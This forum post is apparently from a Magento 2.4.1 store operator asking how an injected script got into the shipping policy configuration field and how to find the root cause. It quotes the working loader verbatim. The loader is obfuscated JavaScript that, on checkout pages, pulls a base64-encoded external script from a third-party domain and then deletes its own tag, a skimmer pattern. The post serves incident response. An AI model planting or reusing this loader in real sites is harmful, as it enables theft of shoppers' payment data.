Skip to content

script injected in magento 2.4.1 at shipping_policy_content

we found a script like this

in shipping/shipping_policy/shipping_policy_content

<script id="shopcart">((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);a.id="carthelper";a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector("#shopcart")){document.querySelector("#shopcart").remove();}})(window,document,"script","gCaptcha","Y2hlY2tvdXQ","aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM")</script>

Which translates to https://static.webagencyanalytics.com/main.js?v=1.0.3

I’m trying to determine how this was injected but I can’t find references to the script itself or the base64 encoded string or the decoded string

Any ideas how I can detect the root cause?

I’m using modsecurity and I’m already logging GET/POST requests for this.